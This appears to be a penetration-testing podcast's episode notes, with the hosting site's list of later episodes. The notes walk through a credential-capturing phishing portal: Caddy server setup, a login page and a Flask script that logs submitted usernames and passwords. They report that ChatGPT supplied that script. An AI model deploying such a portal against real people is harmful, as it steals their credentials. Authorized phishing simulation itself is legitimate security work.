7MS #583: Cred-Capturing Phishing with Caddy Server
7 Minute Security4 Elo 2023

7MS #583: Cred-Capturing Phishing with Caddy Server

Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:

sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -y

Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile:

domain.com

Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal:














User Name:

Password:



Unauthorized use is prohibited!

This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher:

from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000)

If you don't have Flask installed, do this:

sudo apt install python3-pip -y sudo pip install Flask

Run this file in one session, then in your index.html file make a small tweak in the form action directive:

Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!

Tämä jakso on lisätty Podme-palveluun avoimen RSS-syötteen kautta eikä se ole Podmen omaa tuotantoa. Siksi jakso saattaa sisältää mainontaa.

Jaksot(721)

7MS #665: What I'm Working on This Week - Part 2

7MS #665: What I'm Working on This Week - Part 2

Hello there friends, I'm doing another "what I'm working on this week" episode which includes: BPATTY v1.6 release – big/cool/new content to share here PWPUSH – this looks to be an awesome way (both ...

7 Maalis 202528min

7MS #664: What I'm Working on This Week

7MS #664: What I'm Working on This Week

In today's episode I talk about what I'm working on this week, including: Playing with Sliver C2 and pairing it with ShellcodePack Talking about Netexecer, my upcoming tool that helps automate some o...

28 Helmi 202525min

7MS #663: Pentesting GOAD SCCM

7MS #663: Pentesting GOAD SCCM

Today we live-hack an SCCM server via GOAD SCCM using some attack guidance from Misconfiguration Manager!  Attacks include: Unauthenticated PXE attack PXE (with password) attack Relaying the machine ...

21 Helmi 202529min

7MS #662: Pentesting Potatoes - Part 2

7MS #662: Pentesting Potatoes - Part 2

Hi friends, today we're talking about pentesting potatoes (not really, but this episode is sort of a homage to episode 333 where I went to Boise to do a controls assessment and ended up doing an impro...

14 Helmi 202537min

7MS #661: Baby's First Hetzner and Ludus – Part 2

7MS #661: Baby's First Hetzner and Ludus – Part 2

Today we continue our journey from last week where we spun up a Hetzner cloud server and Ludus.cloud SCCM pentesting range! Topics include: Building a Proxmox Backup Server (this YouTube video was s...

8 Helmi 202537min

7MS #660: Baby's First Hetzner and Ludus

7MS #660: Baby's First Hetzner and Ludus

I had an absolute ball this week spinning up my first Hetzner server, though it was not without some drama (firewall config frustrations and failing hard drives). Once I got past that, though, I got ...

1 Helmi 202534min

7MS #659: Eating the Security Dog Food - Part 8

7MS #659: Eating the Security Dog Food - Part 8

Today I'm excited about some tools/automation I've been working on to help shore up the 7MinSec security program, including: Using Retype as a document repository Leveraging the Nessus API to automat...

24 Tammi 202528min

7MS #658: WPA3 Downgrade Attacks

7MS #658: WPA3 Downgrade Attacks

Hey friends, today we cover: The shiny new 7MinSec Club BPATTY updates A talk-through of the WPA3 downgrade attack, complemented by the YouTube livestream

17 Tammi 202532min

Suosittua kategoriassa Politiikka ja uutiset

uutiscast
aikalisa
politiikan-puskaradio
rss-ootsa-kuullut-tasta
ootsa-kuullut-tasta-2
viisupodi
tervo-halme
rss-podme-livebox
rss-pinnalla
rss-asiastudio
rikosmyytit
otetaan-yhdet
aihe
et-sa-noin-voi-sanoo-esittaa
rss-vaalirankkurit-podcast
rss-kaikki-uusiksi
rss-ulkopoditiikkaa
the-ulkopolitist
rss-raha-talous-ja-politiikka
rss-girls-finish-f1rst